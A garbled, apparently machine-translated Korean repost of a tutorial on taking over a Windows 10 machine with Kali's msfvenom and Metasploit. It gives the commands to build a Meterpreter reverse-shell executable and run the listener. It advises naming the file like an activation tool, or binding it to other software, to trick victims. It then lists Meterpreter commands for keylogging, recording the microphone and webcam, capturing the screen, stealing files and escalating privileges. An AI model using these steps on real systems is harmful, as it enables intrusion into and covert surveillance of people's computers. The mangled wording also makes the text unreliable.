컴퓨터 지식 네트워크 - 컴퓨터 구성 - 칼리는 MSF 로 Windows 컴퓨터에 침투했다.

칼리는 MSF 로 Windows 컴퓨터에 침투했다.

순서

나는 최근에 이상한 편지를 정리했다. 화웨이&; 나는 대우의 코스웨어 소재와 대창과의 인터뷰 제목에 대해 믿어 의심치 않는다. 원하시면 사신으로 받으실 수 있고 팬친구에게 무료로 드립니다 ~

이것은 metasploit 독립 부하 생성기이며 MSF 부하 및 MSF 코딩의 대안입니다. 뒷문을 생성하는 데 사용되는 소프트웨어입니다.

MSFvenom 은 Msfpayload 와 Msfencode 의 조합이며 두 도구 모두 하나의 프레임 인스턴스에 배치됩니다. 20 15 년 6 월 8 일부터 msfvenom 이 msfpayload 와 msfencode 를 대체했습니다.

데모 환경

Kali 202 1.3 을 사용하여 데모 작업 수행.

대상 드론: Win 10 프로페셔널 에디션

소프트웨어: MSFvenom, MSF 콘솔 (Kali 시스템 내장)

1. 관리자 모드로 들어갑니다

사령관: 쿨소

설명: 관리자 모드에서 실행하지 않으면 권한이 부족하다는 메시지가 나타날 수 있습니다. 명령 실행 실패를 방지하려면 관리자 아래에서 다음 명령을 실행합니다.

명령: msfvenom-p windows/meterpreter/reverse _ tcplhost = local IP >; LPORT= 로컬 포트 번호 >–f exe–o 파일 이름 >. 실행 파일의 확장자입니다

설명: 기본 IP 는 자신의 Kali 의 IP 주소를 쓰고, ifconfig 를 사용하여 자신의 Kali 의 IP 주소를 볼 수 있습니다.

로컬 포트는 사용하지 않는 포트 번호를 자유롭게 설정할 수 있습니다. 포트 번호가 이미 사용 중인 경우 파일 생성이 실패할 수 있습니다. 포트 번호만 변경하면 됩니다.

Win 10 활성화 도구를 쓰는 것과 같이 원하는 이름을 파일 이름에 쓸 수 있어 대상 호스트를 쉽게 낚을 수 있습니다.

물론 MSF 는 휴대폰, 맥, 리눅스 등을 침투하는 데도 사용할 수 있다.

다음으로 명령을 실행하여 파일을 생성합니다.

기본적으로 생성된 파일은 루트 디렉토리에 있습니다.

방금 생성한 파일을 대상 드론 Win 10 시스템에 넣습니다.

명령: MSF 콘솔

(1) 명령: exploit/multi/handler 사용 (모듈 선택)

(2) 명령: set payload windows/meterpreter/reverse _ TCP (공격 모듈 선택).

(3) 명령: set lhost192.168.32.1(자체 호스트의 IP 주소 입력).

(4) 명령: setlport1111(방금 파일을 생성했을 때의 포트 번호 입력).

(5) 명령: 표시 옵션 (설정 매개변수 보기)

(6) 명령: exploit -z -j (백그라운드 실행)

이 프로그램을 위장하거나, 아이콘을 변경하거나, 소프트웨어를 바인딩하고, 사용자가 열 때 상대 컴퓨터에 자동으로 설치할 수도 있습니다.

(1) 명령: 세션 (후크 사용자 보기)

(2) 명령: 세션-I 1 (공격할 사용자 선택, 여기서1을 선택합니다.

명령: VNC -i 실행

Cmd 명령:

Cat 는 파일의 내용을 화면으로 읽습니다

Cd 변경 카탈로그

Checksum 은 파일의 체크섬을 검색합니다.

Cp 는 소스를 대상에 복제합니다.

지정한 파일을 삭제합니다

카탈로그 리스트 파일 (ls 의 별칭)

다운로드 파일 또는 디렉토리 다운로드

편집 편집 파일

로컬 작업 디렉토리를 인쇄합니다.

Getwd 인쇄 작업 디렉토리

Lcd 가 로컬 작업 디렉토리를 변경합니다

Lls 는 로컬 파일을 나열합니다.

Lpwd 는 로컬 작업 디렉토리를 인쇄합니다.

Ls 목록 파일

Mkdir 디렉토리 만들기

Mv 는 소스를 타겟으로 이동합니다.

인쇄 작업 디렉토리

Rm 에서 지정된 파일을 삭제합니다

Rmdir 디렉토리 삭제

검색 파일 검색

Show_mount 모든 마운트 지점/논리 드라이브를 나열합니다.

업로드 파일 또는 디렉토리를 업로드합니다.

Pkill 은 이름으로 프로세스를 종료합니다.

Keyscan_start 는 키 입력 캡처 (키보드 기록 시작) 를 시작합니다.

Keyscan_dump 덤프 키 버퍼 (키보드 레코드 다운로드)

Keyscan_stop 키 입력 캡처 중지 (키보드 기록 중지).

Record_mic 거리 기본 마이크 record_mic 녹음 (녹음) x 초.

Webcam_chat 는 화상 채팅을 시작합니다 (비디오, 상대방은 탄창을 가질 것입니다).

웹캠 _ 목록 개별 카메라 (카메라 목록 보기)

Webcam_snap 은 지정된 카메라에서 스냅샷 (카메라 사진 촬영) 을 촬영합니다.

Webcam_stream 은 지정된 카메라의 비디오 스트림을 재생합니다 (카메라 모니터링이 켜져 있음).

Enumdesktops 는 액세스할 수 있는 모든 데스크톱과 창 (양식 목록) 을 나열합니다.

현재 Meterpreter 데스크톱을 가져옵니다.

재부팅 원격 컴퓨터를 다시 시작합니다.

Shutdown 은 원격 컴퓨터를 끕니다.

셸에서 시스템 명령 셸로 이동합니다.

Enumdesktops 는 액세스 가능한 모든 데스크톱과 창을 나열합니다.

현재 meterpreter 데스크톱을 가져옵니다.

Idletime 은 원격 사용자의 유휴 시간 (초) 을 반환합니다.

키보드 _ 전송 키 입력 보내기

키 입력 이벤트를 보냅니다.

Keyscan_dump 는 키 입력 버퍼를 덤프합니다.

Keyscan_start 가 keystroke 캡처를 시작합니다.

Keyscan_stop 키 입력 캡처를 중지합니다.

마우스가 마우스 이벤트를 보냅니다.

화면 공유 원격 사용자 데스크톱 실시간 보기

스크린 샷은 대화식 데스크톱의 스크린 샷을 캡처합니다.

Setdesktop Meterpreters 의 현재 데스크톱을 변경합니다.

Uictl 은 일부 사용자 인터페이스 모듈을 제어합니다.

Record_mic 은 x 초 동안 기본 마이크의 오디오를 기록합니다.

웹캠 _ 채팅 화상 채팅 시작

웹캠을 나열합니다.

지정된 웹캠에서 스냅샷을 찍습니다.

웹캠 스트림 지정된 네트워크 카메라의 비디오 스트림을 재생합니다.

재생 파형 오디오 파일 (. Wav) 파일.

Getsystem 은 사용자의 권한을 로컬 시스템의 권한으로 높이려고 합니다.

-f 메모장을 실행하여 메모장을 엽니다.

---------

원본 링크:/rfz _ 322/article/details/123367668

上篇: Windows Win7 원 클릭 완전 실제 재설치 시스템 下篇: ROG 마술 162022 의 이유는 무엇입니까?
관련 내용